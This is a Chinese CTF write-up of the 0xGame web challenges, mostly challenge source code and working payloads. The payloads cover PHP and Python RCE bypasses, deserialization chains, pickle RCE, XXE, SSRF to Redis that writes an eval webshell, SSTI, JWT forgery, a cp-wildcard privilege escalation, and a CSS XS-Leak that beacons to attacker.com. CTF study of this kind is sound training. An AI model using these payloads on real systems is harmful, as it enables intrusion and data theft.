Week 1
RCE1
考点:或运算构造 system
<?php error_reporting(0); highlight_file(__FILE__); $rce1 = $_GET['rce1']; $rce2 = $_POST['rce2']; $real_code = $_POST['rce3']; $pattern = '/(?:\d|[\$%&#@*]|system|cat|flag|ls|echo|nl|rev|more|grep|cd|cp|vi|passthru|shell|vim|sort|strings)/i'; function check(string $text): bool { global $pattern; return (bool) preg_match($pattern, $text); } if (isset($rce1) && isset($rce2)){ if(md5($rce1) === md5($rce2) && $rce1 !== $rce2){ if(!check($real_code)){ eval($real_code); } else { echo "Don't hack me ~"; } } else { echo "md5 do not match correctly"; } } else{ echo "Please provide both rce1 and rce2"; } ?>
查根目录文件:
print_r(scandir('/'));
利用或运算绕过过滤:
(systee|systel)('tac /f???'); // 直接一或运算将 system 构造出来,或者这里没过滤反引号,直接 print(`tac /f???`);也行,或者 readfile('/'.'fl'.'ag');

Lemon
Ctrl+U 直接获取 Flag。

HTTP 请求头检测
注意最后这个要求 clash 代理,用请求头 Via: clash。

Rubbish_Unser
考点:hash 触发 Exception 中 __toString 魔术绕过 hash
<?php error_reporting(0); highlight_file(__FILE__); class ZZZ { public $yuzuha; function __construct($yuzuha) { $this -> yuzuha = $yuzuha; } function __destruct() { echo "破绽,在这里!" . $this -> yuzuha; } } class HSR { public $robin; function __get($robin) { $castorice = $this -> robin; eval($castorice); } } class HI3rd { public $RaidenMei; public $kiana; public $guanxing; function __invoke() { if($this -> kiana !== $this -> RaidenMei && md5($this -> kiana) === md5($this -> RaidenMei) && sha1($this -> kiana) === sha1($this -> RaidenMei)) return $this -> guanxing -> Elysia; } } class GI { public $furina; function __call($arg1, $arg2) { $Charlotte = $this -> furina; return $Charlotte(); } } class Mi { public $game; function __toString() { $game1 = @$this -> game -> tks(); return $game1; } } if (isset($_GET['0xGame'])) { $web = unserialize($_GET['0xGame']); throw new Exception("Rubbish_Unser"); } ?>
垃圾回收去掉最后一个}去绕过,hash 用 Exception 绕过。
<?php error_reporting(0); class ZZZ { public $yuzuha; function __construct($yuzuha) { $this -> yuzuha = $yuzuha; } function __destruct() { echo "破绽,在这里!" . $this -> yuzuha; } } class HSR { public $robin="system('env');"; function __get($robin) { echo "4"; $castorice = $this -> robin; eval($castorice); } } class HI3rd { public $RaidenMei; public $kiana; public $guanxing; function __invoke() { echo "3"; if($this -> kiana !== $this -> RaidenMei && md5($this -> kiana) === md5($this -> RaidenMei) && sha1($this -> kiana) === sha1($this -> RaidenMei)) return $this -> guanxing -> Elysia; } } class GI { public $furina; function __call($arg1, $arg2) { echo "2"; $Charlotte = $this -> furina; return $Charlotte(); } } class Mi { public $game; function __toString() { echo "1"; $game1 = @$this -> game -> tks(); return $game1; } } $a=new ZZZ(1); $a-> yuzuha=new Mi(); $a-> yuzuha->game=new GI(); $a-> yuzuha->game->furina=new HI3rd(); $a-> yuzuha->game->furina->kiana=new Exception("",1);$a-> yuzuha->game->furina->RaidenMei=new Exception("",2); $a-> yuzuha->game->furina->guanxing=new HSR(); echo urlencode(serialize($a)); ?>
Lemon_RevEnge
考点:污染 os.path.pardir 进行目录穿越
from flask import Flask,request,render_template import json import os app = Flask(__name__) def merge(src, dst): for k, v in src.items(): if hasattr(dst, '__getitem__'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v) class Dst(): def __init__(self): pass Game0x = Dst() @app.route('/',methods=['POST', 'GET']) def index(): if request.data: merge(json.loads(request.data), Game0x) return render_template("index.html", Game0x=Game0x) @app.route("/<path:path>") def render_page(path): if not os.path.exists("templates/" + path): return "Not Found", 404 return render_template(path) if __name__ == '__main__': app.run(host='0.0.0.0', port=9000)
Payload:
{ "__init__":{ "__globals__":{ "os":{ "path":{ "pardir":"!" } } } } }


留言板(粉)
管理员登录,发现网页名字提示是打 XXE。
<!DOCTYPE evil [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <user><username>&xxe;</username><password>&xxe;</password></user>

留言板_reVenge
无过滤无回显 XXE 打完了。

Week 2
你好,爪洼脚本
考 aaEncode 加密。
0xGame{Hello,JavaScript}
马哈鱼商店
考点:pickle 反序列化(文本协议)
买 flag 是假的,买 pickle,将折扣改成 0.0001 就行。

Use GET To Send Your Loved Data!!! BlackList = [b'', b''] @app.route('/pickle_dsa') def pic(): data = request.args.get('data') if not data: return "Use GET To Send Your Loved Data" try: data = base64.b64decode(data) except Exception: return "Cao!!!" for b in BlackList: if b in data: return "卡了" p = pickle.loads(data) print(p) return f" Vamos! {p}
打 pickle 反序列化。
import pickle import base64 import os class P(object): def __reduce__(self): return (eval, ("__import__('os').popen('env').read()",)) payload = pickle.dumps(P(), protocol=0) b64_payload = base64.b64encode(payload) print(payload) print(b64_payload.decode())
注意这要用 protocol=0(文本协议),b'' 是单个字节 0x1E(ASCII Record Separator)。它想拦包含该字节的数据。Pickle 的二进制协议很容易出现各种非可打印字节(包括 0x1E),而文本协议(protocol=0)通常不会包含 0x1E,所以用 protocol=0 构造 payload,避免 0x1E。
wp 的方法倒是有点意思。
import base64'csubprocess check_output (S'env' tR.'''.encode() print(base64.b64encode(opcode).decode())
DNS 想要玩
考点:进制绕过黑名单进行 dns 解析(dns 重绑定)
题目给了源码。
from flask import Flask, request from urllib.parse import urlparse import socket import os app = Flask(__name__) BlackList = [ 'localhost', '@', '172', 'gopher', 'file', 'dict', 'tcp', '0.0.0.0', '114.5.1.4' ] def check(url: str) -> bool: parsed = urlparse(url) host = parsed.hostname if not host: return False host_ascii = host.encode('idna').decode('utf-8') try: ip = socket.gethostbyname(host_ascii) except Exception: return False return ip == '114.5.1.4' @app.route('/') def index(): return open(__file__, 'r', encoding='utf-8').read() @app.route('/ssrf') def ssrf(): raw_url = request.args.get('url') if not raw_url: return 'URL Needed' for u in BlackList: if u in raw_url: return 'Invaild URL' if check(raw_url): cmd = request.args.get('cmd', '') return os.popen(cmd).read() else: return 'NONONO' if __name__ == '__main__': app.run(host='0.0.0.0', port=8000)
很多办法,用进制绕过就行,我这里用 10 进制绕过。
ssrf?url=http://1912930564/&cmd=cat%20/f*
预期解是考 dns 重绑定。


这真的是反序列化
考点:利用 SoapClient 触发 __call 用 SSRF 来打 Redis
根据 wp 的代码是。
<?php class pure { public $web; public $misc; public $crypto; public $pwn; } // 创建对象实例 $a = new pure(); $a->web = 'SoapClient'; $a->misc = null; $a->pwn = null; // 配置目标地址和 Redis 命令 $target = 'http://127.0.0.1:6379/'; $poc = "AUTH 20251206\r\n" . "CONFIG SET dir /var/www/html/\r\n" . "CONFIG SET dbfilename shell.php\r\n" . "SET x '<?= @eval(\$_POST[1]) ?>'\r\n" . "SAVE"; // 构造 crypto 数组(攻击载荷的核心) $a->crypto = array( 'location' => $target, 'uri' => "hello\"\r\n" . $poc . "\r\nhello" ); // 输出 URL 编码后的序列化字符串 echo serialize($a);
比赛时我参考的是,但是改完后就是打不了,后面对比 wp 才知道第一个 hello 后面少一个双引号。
<?php $target = 'http://127.0.0.1:6379/'; $poc1 = "AUTH 20251206"; $poc2 = "CONFIG SET dir /var/www/html/"; $poc3 = "CONFIG SET dbfilename shel.php"; $poc4 = "SET x '<?= @eval(\$_POST[1]) ?>'"; $poc5 = "SAVE"; $a = array('location' => $target, 'uri' => 'hello"^^' . $poc1 . '^^' . $poc2 . '^^' . $poc3 . '^^' . $poc4 . '^^' . $poc5 . '^^hello'); $b = serialize($a); $b = str_replace('^^', "\r\n", $b); $c = unserialize($b); class pure { public $web = 'SoapClient'; public $misc = null; public $crypto; public $pwn; } $a=new pure(); $a->crypto=$c; echo urlencode(serialize($a));
404NotFound
测试一下 SSTI。

过滤了一些关键词和点。
{{lipsum['__glo''bals__']['o''s']['po''pen']('cat /f*')['re''ad']()}}

Plus_plus
考点:限制字符的自增 rce
输入?0xGame=1 得到源码。
<?php error_reporting(0); if (isset($_GET['0xGame'])) { highlight_file(__FILE__); } if (isset($_POST['web'])) { $web = $_POST['web']; if (strlen($web) <= 120) { if (is_string($web)) { if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-BD-GI-Z~\\]/", $web)) { eval($web); } else { echo("NONONO!"); } } else { echo "No String!"; } } else { echo "too long!"; } } ?>
需要把换行的都去掉,然后进行一次 URL 编码,因为中间件会解码一次,所以我们构造的 payload 先变成这样。
get 0xGame=1&1=system&2=cat /f* post web=%24_%3D%5B%5D._%3B%24__%3D%24_%5B1%5D%3B%24_%3D%24_%5B0%5D%3B%24_%2B%2B%3B%24_1%3D%2B%2B%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D%24_1.%2B%2B%24_.%24__%3B%24_%3D_.%24_(71).%24_(69).%24_(84)%3B%24%24_%5B1%5D(%24%24_%5B2%5D)%3B%20
我只想要你的 PNG!
考点:文件名注入
只能上传 png,但是源码提示有个 check.php,上传文件发现文件上传后被删除,但是原文件名出现在 check.php 里,那就是打文件名注入,先尝试一下。

果然可以执行命令。

然后直接写马连。

Week 3
消栈逃出沙箱 (1) 反正不会有 2
解法:Typhon 梭哈沙箱逃逸
from flask import Flask, request, Response import sys import io app = Flask(__name__) blackchar = "&*^%#${}@!~`·/<>" def safe_sandbox_Exec(code): whitelist = { "print": print, "list": list, "len": len, "Exception": Exception, } safe_globals = {"__builtins__": whitelist} original_stdout = sys.stdout original_stderr = sys.stderr sys.stdout = io.StringIO() sys.stderr = io.StringIO() try: exec(code, safe_globals) output = sys.stdout.getvalue() error = sys.stderr.getvalue() return output or error or "No output" except Exception as e: return f"Error: {e}" finally: sys.stdout = original_stdout sys.stderr = original_stderr @app.route("/") def index(): return open(__file__).read() @app.route("/check", methods=["POST"]) def check(): data = request.form.get("data", "") if not data: return Response("NO data", status=400) for d in blackchar: if d in data: return Response("NONONO", status=400) secret = safe_sandbox_Exec(data) return Response(secret, status=200) if __name__ == "__main__": app.run(host="0.0.0.0", port=9000)
Typhon 梭哈。
import Typhon cmd = "ls /" # Typhon 会把它转为可执行的 Python payload Typhon.bypassRCE( cmd, local_scope={'__builtins__': {'print':print,'list':list,'len':len,'Exception':Exception}}, banned_chr=list("&*^%#${}@!~`·/<>"), max_length=160, interactive=False, print_all_payload=True, # 想看所有候选就开 log_level='INFO' )
稍微改一下,首先要结果要+read(),然后要 print 打印出来。
print(list.__class__.__subclasses__(list.__class__)[0].register.__globals__['__builtins__']['__import__']('os').popen('env').read())
解法二:python 栈帧沙箱逃逸+traceback
使用 Exception 引发异常,并捕获异常对象,异常对象中,有一个 __traceback__ 属性,它指向相关的回溯对象。从回溯对象中,我们可以获取栈帧。然后,从回溯对象中,我们可以访问 tb_frame 来获取当前栈帧,然后 __traceback__.tb_frame.f_back.f_back 获取外层函数 safe_sandbox_Exec 栈帧,利用栈帧的 f_globals 获取原始环境中的 __builtins__,然后执行命令。
import requests' try: raise Exception() except Exception as e: frame = e.__traceback__.tb_frame.f_back.f_back builtins = frame.f_globals['__builtins__'] output = builtins.__import__('os').popen('env').read() print(output) ''' url = "http://9000-e2e3ae94-819b-4f4f-b420-e85c8d221c24.challenge.ctfplus.cn/check" res = requests.post(url, data={"data": payload}) print(res.text)
文件查询器(蓝)
考点:file_get_contents 触发 phar 反序列化
发现文件上传和查询文件功能,查/etc/passwd 有回显,有文件包含,直接读源码 index.php。
<?php error_reporting(0); class MaHaYu{ public $HG2; public $ToT; public $FM2tM; public function __construct() { $this -> ZombiegalKawaii(); } public function ZombiegalKawaii() { $HG2 = $this -> HG2; if(preg_match("/system|print|readfile|get|assert|passthru|nl|flag|ls|scandir|check|cat|tac|echo|eval|rev|report|dir/i",$HG2)) { die("这这这你也该绕过去了吧"); } else{ $this -> ToT = "这其实是来自各位的"; } } public function __destruct() { $HG2 = $this -> HG2; $FM2tM = $this -> FM2tM; echo "Wow"; var_dump($HG2($FM2tM)); } } z $file=$_POST['file']; if(isset($_POST['file'])) { if (preg_match("/'[\$%&#@*]|flag|file|base64|go|git|login|dict|base|echo|content|read|convert|filter|date|plain|text|;|<|>/i", $file)) { die("对方撤回了一个请求,并企图蒙混过关"); } echo base64_encode(file_get_contents($file)); }
一眼就知道是 file_get_contents 触发 phar 反序列化,gz 压一下,改一下文件名分别绕过内容 waf 和文件名 waf。
<?php error_reporting(0); class MaHaYu{ public $HG2; public $ToT; public $FM2tM; public function __construct() { $this -> ZombiegalKawaii(); } public function ZombiegalKawaii() { $HG2 = $this -> HG2; if(preg_match("/system|print|readfile|get|assert|passthru|nl|flag|ls|scandir|check|cat|tac|echo|eval|rev|report|dir/i",$HG2)) { die("这这这你也该绕过去了吧"); } else{ $this -> ToT = "这其实是来自各位的"; } } public function __destruct() { $HG2 = $this -> HG2; $FM2tM = $this -> FM2tM; echo "Wow"; var_dump($HG2($FM2tM)); } } $a = new MaHaYu(); $a -> HG2 = "getenv"; $a->FM2tM="FLAG"; //本来用 glob 发现根目录无 flag,直接看环境就好了 $phar = new Phar("2.phar"); //.phar 文件 $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); //固定的 $phar->setMetadata($a); $phar->addFromString("exp.txt", "test"); //随便写点什么生成个签名,添加要压缩的文件 $phar->stopBuffering(); $fp = gzopen("2.phar.gz", 'w9'); gzwrite($fp, file_get_contents("2.phar")); gzclose($fp); // 将 2.phar.gz 重命名为 2.phar.png @rename("2.phar.gz", "1.phar.png"); ?>
然后打 phar 协议就好了。
phar://upload/1.phar.png

长夜月
代码很明显,先 token 伪造然后再原型链污染时间就行,先说 token 伪造,它这个注册的时候用密钥生成的,但是登入时解 token 没有鉴权,所以直接伪造 admin 就行。
import jwt import datetime import time # 定义标头(Headers) headers = {"alg":"HS256","typ":"JWT"} # 定义有效载体(Payload) token_dict = { "username":"admin", "password":"user", "iat":time.time(), "exp":time.time() + 36000} # 密钥 jwt_token = jwt.encode(token_dict, secret, algorithm='HS256', headers=headers) print("JWT Token:", jwt_token)
然后将 min_public_time 污染成 8 月 3 号前就行。
{"__proto__": { "min_public_time": "2025-08-01" }}

放开我的变量
考点:cp 通配符提权
一扫发现一个后门/asdback.php,直接连接 WebShell。
<?php highlight_file(__FILE__); echo("Please Input Your CMD"); $cmd = $_POST['__0xGame2025phpPsAux']; eval($cmd); ?>
但是拿不了 flag,提权也不行,一看 start.sh,湾区杯和 N1 写过,打 cp 通配符提权。
cd /var/www/html/primary/ echo "">"-H" ln -s /flag ff cd ../marstream cat f

这真的是文件上传
考点:js 审计之 ejs 渲染
//original-author: gtg2619 //adapt: P const express = require('express'); const ejs = require('ejs'); const fs = require('fs'); const path = require('path'); const app = express(); app.set('view engine', 'ejs'); app.use(express.json({ limit: '114514mb' })); const STATIC_DIR = __dirname; function serveIndex(req, res) { // Useless Check , So It's Easier var whilePath = ['index']; var templ = req.query.templ || 'index'; if (!whilePath.includes(templ)){ return res.status(403).send('Denied Templ'); } var lsPath = path.join(__dirname, req.path); try { res.render(templ, { filenames: fs.readdirSync(lsPath), path: req.path }); } catch (e) { res.status(500).send('Error'); } } app.use((req, res, next) => { if (typeof req.path !== 'string' || (typeof req.query.templ !== 'string' && typeof req.query.templ !== 'undefined' && typeof req.query.templ !== null) ) res.status(500).send('Error'); else if (/js$|\.\./i.test(req.path)) res.status(403).send('Denied filename'); else next(); }) app.use((req, res, next) => { if (req.path.endsWith('/')) serveIndex(req, res); else next(); }) app.put('/*', (req, res) => { // Why Filepath Not Check ? const filePath = path.join(STATIC_DIR, req.path); fs.writeFile(filePath, Buffer.from(req.body.content, 'base64'), (err) => { if (err) { return res.status(500).send('Error'); } res.status(201).send('Success'); }); }); app.listen(80, () => { console.log(`running on port 80`); });
<%- global.process.mainModule.require('child_process').execSync('env') %> {"content":"PCUtIGdsb2JhbC5wcm9jZXNzLm1haW5Nb2R1bGUucmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKCdlbnYnKQ0KJT4="}


New_Python!
考点:uuid8 加密
随便注册一个账户登入,得到。
from Crypto.Util.number import getPrime, bytes_to_long from gmpy2 import invert import random import uuid # 通过 RSA 得到 UUID8 的 a # 再通过其他方式获取到 b 和 c # 利用 UUID8 生成 Admin 密码 msg= b'' BITS = 1024 e = 65537 p = getPrime(BITS//2) q = getPrime(BITS//2) n = p * q phi = (p - 1) * (q - 1) d = int(invert(e, phi)) key = bytes_to_long(key) c = pow(key, e, n) dp = d % (p - 1) #print("n = ", n) #print("e = ", e) #print("c = ", c) #print("dp = ", dp) #{}内的 key = key.encode() key = int.from_bytes(key, 'big') pa = uuid.uuid8(a=key) #n = 70344167219256641077015681726175134324347409741986009928113598100362695146547483021742911911881332309275659863078832761045042823636229782816039860868563175749260312507232007275946916555010462274785038287453018987580884428552114829140882189696169602312709864197412361513311118276271612877327121417747032321669 #e = 65537 #c = 46438476995877817061860549084792516229286132953841383864271033400374396017718505278667756258503428019889368513314109836605031422649754190773470318412332047150470875693763518916764328434140082530139401124926799409477932108170076168944637643580876877676651255205279556301210161528733538087258784874540235939719 #dp = 7212869844215564350030576693954276239751974697740662343345514791420899401108360910803206021737482916742149428589628162245619106768944096550185450070752523
先 rsa 解密得到 a。
import math import random import re # Given RSA parameters and leak n = 70344167219256641077015681726175134324347409741986009928113598100362695146547483021742911911881332309275659863078832761045042823636229782816039860868563175749260312507232007275946916555010462274785038287453018987580884428552114829140882189696169602312709864197412361513311118276271612877327121417747032321669 e = 65537 c = 46438476995877817061860549084792516229286132953841383864271033400374396017718505278667756258503428019889368513314109836605031422649754190773470318412332047150470875693763518916764328434140082530139401124926799409477932108170076168944637643580876877676651255205279556301210161528733538087258784874540235939719 dp = 7212869844215564350030576693954276239751974697740662343345514791420899401108360910803206021737482916742149428589628162245619106768944096550185450070752523 def recover_p_from_dp(n: int, e: int, dp: int, max_trials: int = 256) -> int: """Recover a prime factor p of n from e and dp (where dp = d mod (p-1)). Strategy: Let k = e*dp - 1, which is a multiple of (p-1). Use a Miller-style splitting approach: factor out powers of two and try gcd(pow(g, k', n) - 1, n) during repeated squaring.""" k = e * dp - 1 # Remove factors of 2 from k r = 0 t = k while t % 2 == 0: t //= 2 r += 1 for _ in range(max_trials): g = random.randrange(2, n - 2) x = pow(g, t, n) if x == 1 or x == n - 1: continue for _ in range(r + 1): p = math.gcd(x - 1, n) if 1 < p < n: return p x = pow(x, 2, n) if x == 1: break # Fallback: direct attempt with k for _ in range(max_trials): g = random.randrange(2, n - 2) x = pow(g, k, n) p = math.gcd(x - 1, n) if 1 < p < n: return p raise ValueError("Failed to recover prime factor with dp leak") def modinv(a: int, m: int) -> int: return pow(a, -1, m) def int_to_bytes(i: int) -> bytes: if i == 0: return b"\x00" length = (i.bit_length() + 7) // 8 return i.to_bytes(length, 'big') def padding(input_string: str) -> int: byte_string = input_string.encode('utf-8') if len(byte_string) > 6: byte_string = byte_string[:6] padded_byte_string = byte_string.ljust(6, b'\x00') padded_int = int.from_bytes(padded_byte_string, byteorder='big') return padded_int def extract_braced_value(text: str) -> str | None: match = re.search(r"\{([^}]*)\}", text) return match.group(1) if match else None def main(): # Recover p from dp p = recover_p_from_dp(n, e, dp) q = n // p assert p * q == n phi = (p - 1) * (q - 1) d = modinv(e, phi) m = pow(c, d, n) m_bytes = int_to_bytes(m) decoded = m_bytes.decode('utf-8', errors='ignore') inner = extract_braced_value(decoded) if inner is None: # Fallback: treat entire m as integer 'a' a_full = m else: a_full = int.from_bytes(inner.encode('utf-8'), 'big') a_48 = a_full & ((1 << 48) - 1) print("p=", p) print("q=", q) print("m_bytes=", decoded) print("a_full=", a_full) print("a_48=", a_48) if __name__ == "__main__": main()
a=109343314834543
响应头看到 b=120604030108。

目录扫描得到 auth,得到 c=7430469441。

直接 uuid8 加密即可。
import uuid def uuid8_from_chunks(a: int, b: int, c: int) -> uuid.UUID: a48 = a & ((1 << 48) - 1) b12 = b & ((1 << 12) - 1) c62 = c & ((1 << 62) - 1) int_uuid = (a48 << 80) | (b12 << 64) | c62 int_uuid |= (0x8 << 76) # version 8 int_uuid |= (0x2 << 62) # RFC 4122 variant return uuid.UUID(int=int_uuid) def main() -> None: a = 109343314834543 b = 120604030108 c = 7430469441 u = uuid8_from_chunks(a, b, c) print(u) if __name__ == "__main__": main()
admin/63727970-746f-849c-8000-0001bae3f741 登入,执行 env 即可。

Week 4
SpringShiro
拿到附件,知道用户密码是 admin/123456,登进去什么也没有,登入抓包结合题目应该是 shiro 反序列化。

目录扫描没发现啥东西,但是密钥一般都在/actuator/heapdump,访问得到,然后用工具解密。
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
得到 qebXusiEQHNsQq+TDqfsFQ==。

java -jar shiro_attack-4.7.0-SNAPSHOT-all.jar
然后爆破利用链执行命令就行。
绳网委托 Bottle 版
考点:abort 无回显
flask 框架,尝试发现过滤了{}<>,那肯定打 bottle 的 pyhton 代码执行,就打 abort 吧。
由于过滤了<>,用引号包裹绕过语法检测。
''' % from bottle import abort % a=__import__('os').popen("ls /").read() % abort(404,a) % end '''
看看源码。
from bottle import Bottle, request, template, run, static_file from datetime import datetime app = Bottle() messages = [] def Comment(message):.join([f""" <div> <img src="/static/avatar2.jpg" alt="Avatar"> <div> <p>{item['text']}</p> <small>#{idx + 1} · {item['time']}</small> </div> </div> """ for idx, item in enumerate(message)]) board = f"""//前端代码 """ return board def check(message): filtered = message.replace("{", " ").replace("}", " ").replace("eval", "?").replace("system", "~").replace("exec","?").replace("7*7","我猜你想输入 7*7").replace("<","尖括号").replace(">","尖括号") return filtered @app.route('/') def index(): return template(Comment(messages)) @app.route('/comment', method='POST') def submit(): text = check(request.forms.get('message')) now = datetime.now().strftime("%Y-%m-%d %H:%M") messages.append({"text": text, "time": now}) return template(Comment(messages)) @app.route('/static/<filename:path>') def send_static(filename): return static_file(filename, root='./static') if __name__ == '__main__': run(app, host='0.0.0.0', port=9000)
跨站脚本攻击叫 CSS 还是 XSS
考点:用 CSS 注⼊实现 XS Leak
这题就是下面 app.js 与 bot.js 有用。
这里显然当 admin 登进就会有 flag,但是打不了 session 伪造,看看 bot.js,作用就是让 admin 身份的 bot 访问 url,而这个 url 就是 app.js 中 report 路由中的参数,有什么?这里利用 CSS 注⼊实现 XS Leak,⼀个常⻅的⽅法是利⽤ CSS 选择器匹配指定标签的某个属性的内容,举例:
/* 匹配 content 属性以"a"开头的 meta 标签 */ meta[name="secret"][content^="a"] { background: url("http://attacker.com?q=a"); }
当这个 CSS 规则匹配时,浏览器会向 http://attacker.com?q=a 发起请求,攻击者就知道 content 属性以"a"开头。
而在 view 页面中。
<meta readonly name="secret" content="<%- locals.secret %>">

当 admin 用户访问时,flag 会被放在 meta 标签中,也就是说,我们构造恶意 css 语句,让 bot 去访问/view/:id 路由,然后 bot 的 view 页面包含 flag,然后我们利用 css 注入接收泄露的 flag,所有代码如下。
exp.html
<script> const sleep = (ms) => new Promise(resolve => setTimeout(resolve, ms)); (async function () { while (true) { try { const res = await fetch('http://host.docker.internal:8000/next'); const note_id = await res.text(); if (note_id === 'done') break; const w = window.open('http://localhost:3000/view/' + note_id); await sleep(1000); if (w) w.close(); } catch (e) { console.error(e); await sleep(1000); } } })(); </script>
from flask import Flask, request from flask_cors import cross_origin import requests import string import re import os app = Flask(__name__) dicts = string.ascii_letters + string.digits + r'{}-_'' meta[name="secret"][content^="{}"] {{ background: url("http://host.docker.internal:8000/leak?c={}"); }}''' # 随机注册登录一个普通用户 data = { 'username': os.urandom(6).hex(), 'password': os.urandom(6).hex() } s = requests.Session() s.post('http://127.0.0.1:10800/register', data=data) s.post('http://127.0.0.1:10800/login', data=data) def report(): s.post('http://127.0.0.1:10800/report', data={ 'url': 'http://host.docker.internal:8000/exp.html' }) def paste(current_flag: str): global next_note_id if current_flag.endswith('}'): next_note_id = 'done' print('done') return' head, meta { display: block; } ''' for c in dicts: content += payload.format(current_flag + c, c) res = s.post('http://127.0.0.1:10800/paste', data={ 'content': '<div><style>' + content + '</style></div>' }) # 提取下一条笔记 ID match = re.findall(r""/view/([^""]+)"", res.text) if match: next_note_id = match[0] print('next note id: ' + next_note_id) @cross_origin() @app.route('/next') def next(): return next_note_id @app.route('/exp.html') def exp_html(): with open('exp.html', 'r', encoding='utf-8') as f: return f.read() @app.route('/leak') def leak(): global flag c = request.args.get('c', '') flag += c print('flag: ' + flag) paste(flag) return 'ok' if __name__ == '__main__': paste('') report() app.run(host='0.0.0.0', port=8000)
旧吊带袜天使:想吃真蛋糕的 Stocking
考点:模型污染攻击
import torch from model_server import SimpleDessertClassifier # 加载原始模型 model = SimpleDessertClassifier() sd = model.state_dict() # 找到输出层 last_linear_weight = None last_linear_bias = None for k in sorted(sd.keys()): if k.endswith('.weight') and sd[k].shape[0] == 3: last_linear_weight = k last_linear_bias = k.replace('.weight', '.bias') break if last_linear_weight is None: raise RuntimeError("未能找到输出层 Linear") # 污染输出层 sd[last_linear_weight] = torch.zeros_like(sd[last_linear_weight]) sd[last_linear_bias] = torch.tensor([-10.0, 10.0, 0.0]) # 保存污染后的模型 torch.save(sd, "poisoned_fixed.pth")

